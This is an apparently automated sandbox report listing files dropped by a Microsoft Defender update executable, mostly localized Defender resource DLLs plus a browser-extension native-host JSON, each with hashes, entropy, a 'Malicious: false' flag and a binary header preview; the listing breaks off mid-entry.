C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\bg-BG\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	29416
Entropy (8bit):	5.351887592007768
Encrypted:	false
SSDEEP:	384:7rTpJ4DyEhyXvb1vstW33294WS8/WPRDBRJfJs/Al3IKO:7rV4huvUVPmR1PK/KO
MD5:	6275E196D18A7E2E298B30AF3ED5C880
SHA1:	240364A589E90A9DE843CBB9C34555A2E4274793
SHA-256:	06B162090901AC0604283E1CE2EC1928E0A7C651332C3E7BE593E438DB02AC88
SHA-512:	54BFC5FA5D4DB45538E0C60454AB1E58371338C982496A19485BC76A3047E0264F2B30070B5A4E1A30B865FE38A95FF36C758790E5B8C8EE5B8ACEAFA200AEA8
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....JVa...........!.........P...............................................p............@.......................................... ...M...........R... ...........................................................................................rdata..p...........................@..@.rsrc....M... ...N..................@..@.............JVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$...H...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\bn-IN\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	29944
Entropy (8bit):	5.555067530565591
Encrypted:	false
SSDEEP:	768:7ruX333303MqF6WVHrS3snXlFwDzffQ6SMn6vvvU98Io/PI44te1eF3r+YR1Ph:F64HK7+YHPh
MD5:	231D5D0EC76C7498E5A94E120943699F
SHA1:	D8DF8518946F02F5C51860983188C574B10A9180
SHA-256:	1807A40E971F9A586671F144CFB34404D2AFAA027EC9E670E323BA70577FC9E4
SHA-512:	E62D8578FA404E1753CA5225AD6DBFDA8AA392B4340C4DCDE8E310CAE522A4960536AD9192D8A18DF47030C8380056D896ECC378A84F3EF9BA2192B6C7DC0024
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....JVa...........!.........R...............................................p......\b....@.......................................... ...O...........T... ...........................................................................................rdata..p...........................@..@.rsrc....O... ...P..................@..@.............JVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$...J...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\bs-Latn-BA\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	28392
Entropy (8bit):	5.05898751052722
Encrypted:	false
SSDEEP:	384:7rgBdq0HifHAHyuJv3JSF666n/o001ZAGmIbmLWS8/W+RDBRJilSlGsM3k2:7r8dYuJYyn/oVv3zjR1PihX5
MD5:	6C4B5C9E187A6B13C39FAA41C742EDD6
SHA1:	30A5B3B8826EE8741CD09D5AD65D6BAA2DC68BB0
SHA-256:	9C776358CD7A47CCBA26F992472A0A739C6F0C152B89B5AEDDCACA8AC43684F0
SHA-512:	16E9795DD6EF63CACA9C7D7E96BF0CB2C0177641213F387586D4243E159E6464B1E736A1892071B80433F7F825A0530CEEB72EBABB4F4F7EB3802879AFED916F
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....JVa...........!.........L...............................................p............@.......................................... ...I...........N... ...........................................................................................rdata..p...........................@..@.rsrc....I... ...J..................@..@.............JVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$...D...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\ca-ES-valencia\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	29928
Entropy (8bit):	4.978741308381524
Encrypted:	false
SSDEEP:	768:7rleQQmmfwxJvYOmnVmJYlEmnVY4mxYCOAlc50EsUpVJg94T4OCaTR1PD/1zx:9eFlNTHPDdx
MD5:	C9E9AE82C7782DC0E66BFE5EFEFF336C
SHA1:	676F16943FAB27A375C2E3F3AC0CE921AB751367
SHA-256:	CA202FDD69FB81DBF24708D144E942FC10ACCFA4703BE979AAD55FD88B62E7F6
SHA-512:	AE90BB4093A1879E8876D45262004AD10FCC9BE13D4BE1F9164C866827F2C48C28CE170274CDA4D0C13C3CE2EBF8106E5D374300F51EDEDE6E580F38BADD75CA
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....JVa...........!.........R...............................................p............@.......................................... ...N...........T... ...........................................................................................rdata..p...........................@..@.rsrc....N... ...P..................@..@.............JVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$...J...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\ca-ES\MpAsDesc.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	67816
Entropy (8bit):	4.158464028484954
Encrypted:	false
SSDEEP:	768:7rDj4mcWQ7uhqYxT352UL2dSsq5/8Vczyuz9ppJ4cwQRMC20hvQii98+wEH4cdqd:7WQ170VcfRMZgqHPO/
MD5:	D2A485200AE94654A45301149D87A8A1
SHA1:	501C933C5BC3D5DC9AFADC86FC73D1567DCDADDD
SHA-256:	9164442B33BAA1DAAF4609189D8169CA9DFA67BB673683F66A49ED9145DA7585
SHA-512:	7D763413C96FB4197216F03028046A510E5393EE9789E827DC9665243889491A05E8A4ACDAF813E3E8773E5E952F53960C02AC86FBD4C83EE402B5DEF44CD17B
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!......................................................................@.......................................... ..T................ ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.............I.........T...8...8........I.........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....(..X....rsrc$02.... ......d...!Z...!.4@e_/x!......I.........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\ca-ES\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	29928
Entropy (8bit):	4.970820382866816
Encrypted:	false
SSDEEP:	768:7rAjdTb3dD4GbRVgWV9Hw2b4HX4bi2KwNDFWhGWD3IDRU0MZ8HoR1PX6Lz:Yj0KoHPKf
MD5:	0EC7F6A6BDC86183AA58893F948989A2
SHA1:	ABFAB912AF53106A82CD50158EB147F5EC4A3456
SHA-256:	02FC3320529F9A51D88030CE7C03AC3A62517B8141768FE001B995DCFBB202F4
SHA-512:	CD6FC83F8F2A5F676ED60655BB607D2D6DA7D4A274A809D1CAB0854B2257E20CD7D4E0D0FC0C1A1AFD4D2E99F8F0A99A7B89C2C2EDF2F741F7DED7B3AE1DFAD1
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....JVa...........!.........R...............................................p.......S....@.......................................... ...N...........T... ...........................................................................................rdata..p...........................@..@.rsrc....N... ...P..................@..@.............JVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$..8J...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\com.microsoft.defender.be.chrome.json Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	350
Entropy (8bit):	4.8011887903612696
Encrypted:	false
SSDEEP:	6:3HWSjKNde/Ott+dmvVnEuLrORVCqwvFFaFlLulkNCB+SrxxLxeNCWHyLIo:L2kO+WnEeMOUlLAjB/1N/0o
MD5:	60A2FC65D3CC1D3DE9ECD2C5319738FC
SHA1:	873D18E03523BBE80D1410AA475ED6CC2DAF0D9D
SHA-256:	6C6F52B13235148AF305BD614779EA885C00B64D0BB7CC764E3C67198CC524A2
SHA-512:	36E8930108DA1B953DC07809A9E670F923A4F07EAC9AD2A229844E556595CE7383F35001E43AA6877FF42D9BD42C55BB2BF0ED05E058D4E8CFF65E6B2B7A7BFD
Malicious:	false
Preview:	{.. "name": "com.microsoft.defender.browser_extension.native_message_host",.. "description": "Native host for Microsoft Defender Browser Extension",.. "path": "mpextms.exe",.. "type": "stdio",.. "allowed_origins": [.. "chrome-extension://echcggldkblhodogklpincgchnpgcdco/",.. "chrome-extension://lcmcgbabdcbngcbcfabdncmoppkajglo/".. ]..}

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\cs-CZ\MpAsDesc.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	62696
Entropy (8bit):	4.4300925979744425
Encrypted:	false
SSDEEP:	768:7rpChXzlbrS2tVdqSp3wbjfKMoW4EEEddewzR1PiM5md:hChXz1Lf04SjfKMoW4t8ewzHPlmd
MD5:	71EA670E1886321DDDDF005D7B47A7FD
SHA1:	FB9AA4F04C6744123C2E38DE746983C1B82A6F00
SHA-256:	BC031DC51AE7128AEE1ADCCDA0F7ACC9EB3BBE8DE121B206B0E9801E956F82B7
SHA-512:	3BB516F32FC0516DE97CB520AED0E3976BC201183144AF54FF392BB73237767C50794F923C84E738D82A7430C6660EE7301891CACD1517F17DBB6C6391B46070
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!................................................................+.....@.......................................... ..l................ ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.............I.........T...8...8........I.........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....(..X....rsrc$02.... ......d...!Z...!.4@e_/x!......I.........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\cs-CZ\MpEvMsg.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	53496
Entropy (8bit):	4.606804840809272
Encrypted:	false
SSDEEP:	768:7rdMyciFk6/zRyodW7/obSxnjEBIR1PbzT:lMyciFk6/zRy+bSxjwIHPPT
MD5:	C40C173214A061E8BCDF28F6328CAD40
SHA1:	A525D0203A18D9011712A7F6AD89FD84D90B5747
SHA-256:	17B281694628800A6B1541826B912F8FF0788D171A900F6DF4BA8A6AC01B3A46
SHA-512:	B72D26D86B1D28308686A1DD0AE513594D9875AD809C891B9B063220748470154846339D25C89B4EC904F838AD47B0438EB22925CD7C2E70C3686961476760AC
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!......................................................................@.......................................... ................... ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@............]..........T...8...8.......]..........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01..... ..8....rsrc$02.... ..._<.....5..\Z2........~..4]..........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\cs-CZ\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	28408
Entropy (8bit):	5.215365684019082
Encrypted:	false
SSDEEP:	768:7rIXE4QWX0YNoE8gZ04pC5DbUV4qFR1Peizz:Q04QWX0YNojgZ04pC5DbUV4qFHPeYz
MD5:	FFE6628B2AD343CDA7FDFEF38B84B48C
SHA1:	36A72C17996D63635B184CDEC836022A2FD275C7
SHA-256:	B5E81F2E96B81367B16D77BDB21FF45C92B880DF501AD17FEE4F8B1E756C636D
SHA-512:	B20694CA2B5E009BCD981C8FD3E95CF25E16E9293001CCCB53DEC2ABDE6A31535F9213492279BB9527DF0A86B0489DAB7014F3F2A67A3D6D26F26DD1B942B481
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....JVa...........!.........L...............................................p.......7....@.......................................... ..DH...........N... ...........................................................................................rdata..p...........................@..@.rsrc...DH... ...J..................@..@.............JVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$...C...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\cy-GB\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	30456
Entropy (8bit):	4.937872667222882
Encrypted:	false
SSDEEP:	384:7r9i3aB5tg/hPb1Y2YQYTZYxgaM3cNqng73m3cX3u3cjgTyTKT3TsjxTPTBTnTb2:7rhXP9KV7XcdLks3yRR1Pgz3
MD5:	CF1FB8FA2725C2DC530AE045F1ED8A6B
SHA1:	B64794C057E7F9F1F4A5DB0A9164FE21EFB32151
SHA-256:	EEB5D85389F768042AFEB2B1203BCC151069F53DAFED28DB404122013041241F
SHA-512:	259CC37B8488D7B9244450864F4AD2ABDC9A7C8355833F5A1628D5DC4A3123A2FCDBDCC2B8169DA2613527D8885C081915651B41228DEDAC6E5E70D1CC4F9C4D
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....JVa...........!.........T......................................................fT....@.......................................... ..TQ...........V... ...........................................................................................rdata..p...........................@..@.rsrc...TQ... ...R..................@..@.............JVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$...L...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\da-DK\MpAsDesc.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	63720
Entropy (8bit):	4.2102783984881755
Encrypted:	false
SSDEEP:	768:7rRXQqbVuA8rmOXbO5OKi9OUsUR1P11zf:JXQqBuA8b6UHPPf
MD5:	BB1447340673FA9F6B96A9987290F278
SHA1:	C43D250E3BEF83C88A2BB5EA7FA68F54895C2FA5
SHA-256:	A166D52AA0AB379DE33CF5796A5B1861246A36BB8B17D8C87E0F0529338C0AC3
SHA-512:	F0D83F03C31E45C079E1ADE32A4801A6C5B8F71D23421E6D08C655E1216F4A6A3E58F8930C1F3D72CAB8FF25536017D2F1D458FCB97FB848E83830B331A3C3C4
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!.................................................................K....@.......................................... ..T................ ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.............I.........T...8...8........I.........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....(..X....rsrc$02.... ......d...!Z...!.4@e_/x!......I.........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\da-DK\MpEvMsg.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	54520
Entropy (8bit):	4.3994496582380975
Encrypted:	false
SSDEEP:	384:7rpjcx80WKqt9o5uDwepIRXVCQECoz0NKERDH9rLdGtKWfwLW6RDBRJiOhl95UN:7rWxnkErR1PZzUN
MD5:	849192FB21F761073C9ED4A3F5BD4688
SHA1:	A9AAA641C02833616CC0165FA47499DFC1269D7A
SHA-256:	1EAC8A8C05B8AAFB4505A7828D7E7F98567BD0C71DEE4E08AF467F31D34A9828
SHA-512:	F5216D11DC25B246567A1F31B1613533EB57A28FC88AAF7D1064426D6E9488C597F5F3BC7DCA29D3FEC4D239EB86675476488EAE4309F239649740F9D739297E
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!................................................................V.....@.......................................... .................. ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@............]..........T...8...8.......]..........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01..... ..8....rsrc$02.... ..._<.....5..\Z2........~..4]..........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\da-DK\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	28904
Entropy (8bit):	5.034399544515469
Encrypted:	false
SSDEEP:	384:7rV9LJoeS3TVu8td5dCWS8/WtRDBRJjfVslGsJ/Qw:7r7LEVHJIR1PjzLw
MD5:	C63C9C4C55D3B4172BADC2FB45014D5D
SHA1:	DC46D629995E862BA72C80ADC45F62DAD3590728
SHA-256:	88346BDE6D5FC1C0CADFA5755944F466F8960C9CC17A5339851A2BAD42376C70
SHA-512:	F838B0338C194BA2E820B10EC4E2397511AE61A14C6684AF99996DCABED5D225F9672BC4053DF9AAB6F2D586806908DC07BA43C2ADC191081C5F3E5D58E1485D
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....JVa...........!.........N...............................................p............@.......................................... ..XJ...........P... ...........................................................................................rdata..p...........................@..@.rsrc...XJ... ...L..................@..@.............JVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$...E...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\de-DE\MpAsDesc.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	70392
Entropy (8bit):	4.18694461018496
Encrypted:	false
SSDEEP:	1536:g9J3VugBgOPS611GRF9QRquPJAQ7GyHPvt:g9J3VugBgOPS611s/QRquRAQ7Ggd
MD5:	FF00B121B166AB8E4857EABE4AAB9BCC
SHA1:	8CA305D4979F693BCC8425A972438A9074B92C5D
SHA-256:	9285FDDC5E40919E750A95C255588332876547495F6E245BAD983D612DAA4704
SHA-512:	2CC52CBB0EDCAD8BBAFD934E3B259048250F0DF4687FE8FC3F9B3764071F5E1E708FA870EB91D8868687F8A91677C9EBA287AAC195478C613042C97B33495286
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!......................................................................@.......................................... ..@................ ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.............I.........T...8...8........I.........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....(..X....rsrc$02.... ......d...!Z...!.4@e_/x!......I.........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\de-DE\MpEvMsg.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	54504
Entropy (8bit):	4.451774666927673
Encrypted:	false
SSDEEP:	768:7rBOW84CvPTO3VUtmUz8J0GXv3Y1VKLhR1P+pa:v84kt9qAohHP+pa
MD5:	7AF483C2AFFDD95213DDDC495D001DC0
SHA1:	C65458CBD4209A7B09129D5FDD171C758D6A7991
SHA-256:	155EC9FBBE052BCCF189B89EF0F802DA48547D107A26A9E342BF9A23B4F1ADFF
SHA-512:	6DF51B3E38AFB35BCAA066F3DDD56497B9E104D768C5AB1348A82BB7F1B70ED332CACCF302699AA97CC3095252B915F209BAD52F2495A31210CF90DF1940205F
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!................................................................S.....@.......................................... ..@................ ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@............]..........T...8...8.......]..........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01..... ..8....rsrc$02.... ..._<.....5..\Z2........~..4]..........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\de-DE\ProtectionManagement.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	53480
Entropy (8bit):	5.4939020981100315
Encrypted:	false
SSDEEP:	1536:OEH8Kt3U5Pfr9Y5BKqpdmXD6pyFJz1Z9YRHPdE:OKRmpYCmmXXZ9YdS
MD5:	381A9FC19B05718037AA3A552715C54F
SHA1:	01DC93DA9A279EBAC49E7564035849AE3EF4B151
SHA-256:	EA4DDE3088A05BA4A894FB81A8ABF0769DB0A8F79F9D1E5E96BEB916610710C4
SHA-512:	423EDF0088AAF42334F097F7687D964E27293AB508AABDD5A3FF7A2F89E9AB4145FE7BE9FC9E0A00C450F8DBABA2F841252EA9A8A0F7845090E84AA17E5BD34A
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!......................................................................@.......................................... ................... ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@............l...........T...8...8.......l...........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....%..H....rsrc$02.... ...=..E.......'G.:3..t.E....R<l...........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\de-DE\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	31480
Entropy (8bit):	4.903514449361369
Encrypted:	false
SSDEEP:	768:7rf5229Ah0vyaffaXQQOvR8PMFXNJSMbsHrWzxWaNnmeduHJJ17CpR1PPGLh:n5229Ah0vyaffaXQQOvR8PMFXNJSMbsT
MD5:	16C6FFA34E0C59EE77F916EBF9148AFC
SHA1:	C82E4308AC0A909BF4387B86B62320DA9E1FEF51
SHA-256:	6EE8E608A103E991460B51D87AEFCA126EC8744642559B536F70330A848CFB08
SHA-512:	782A0BEE60D339B86A176201C84A8AE117458C1688AF3D0089696ED8124E2006676A91C15E117904FE1FBBF6E4F72D248E75086E9E24436E16CFE458E8521A8E
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....JVa...........!.........X...........................................................@.......................................... ..@U...........Z... ...........................................................................................rdata..p...........................@..@.rsrc...@U... ...V..................@..@.............JVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$..xP...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\el-GR\MpAsDesc.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	75000
Entropy (8bit):	4.68621286355812
Encrypted:	false
SSDEEP:	1536:c3yX1MSgKNnNL+/euj7eCMEE+gL8hKfGujCCaCa52HPJ:c3yX1MSgKNnNL+/euj7eCMEE+gL8hKfH
MD5:	53B61803FB8BDC469ED5D04FB8983233
SHA1:	FB801EDEB5CCBE9E75C2CBA7A28FF05BFEEA270F
SHA-256:	BE1609A94963D07A591C7D38947B28AE79A9D070385E70BD594A1DBD6DF7EB31
SHA-512:	678F7D40E6F54A481353FF0C7AA1C21FAEC66C8B05546CF9AC4B2372EED51918A53A0D4509C12A7DC6B8B2175A86C19C84C5274735560AA2B62B97347A5E2790
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!......................................................... ............@.......................................... ................... ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.............I.........T...8...8........I.........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....(..X....rsrc$02.... ......d...!Z...!.4@e_/x!......I.........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\el-GR\MpEvMsg.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	60152
Entropy (8bit):	4.994721555651978
Encrypted:	false
SSDEEP:	768:7rpd0tgeGeGsnEstzuFtGFil0a9+R1PEcz3:OgTsnPtzuFtGFil0i+HPF
MD5:	9B6F194F0D0EB1ED21B000E07B0CBDCD
SHA1:	FB2E6FF6B553B1E25C142FBD5CF868B98A0E8C2F
SHA-256:	E1A7E2391FFF39162293DD3AE201ADC393D8CC91E83A4B33C2C9A089EE69D203
SHA-512:	F64454892E8E12A33A887CE930A6DFD708CDDD1F76CFEFD909D5AA6ECF0098DB49AC263F4DD2C601A7A12FEC6221F806C4035A5EC8C928CC785550D644720EB0
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!................................................................(.....@.......................................... ................... ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@............]..........T...8...8.......]..........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01..... ..8....rsrc$02.... ..._<.....5..\Z2........~..4]..........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\el-GR\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	30952
Entropy (8bit):	5.453443722839373
Encrypted:	false
SSDEEP:	384:7rqYFfMlN2vyRBNd/gy0b5DYpOLjNB4Okn8OM3mnUJOeTPn5yLOe0FZQiJZhFD7a:7rP6EBZa2z6R1PV/rF
MD5:	222D67D112493530069E47CD64364BAF
SHA1:	F4F6F74D62470C5301BDC537ADC451FEAFBCCEBD
SHA-256:	B6E4B5BF805802069890DF5FD769D48F370620E607809E48E233C78EFE6F90F1
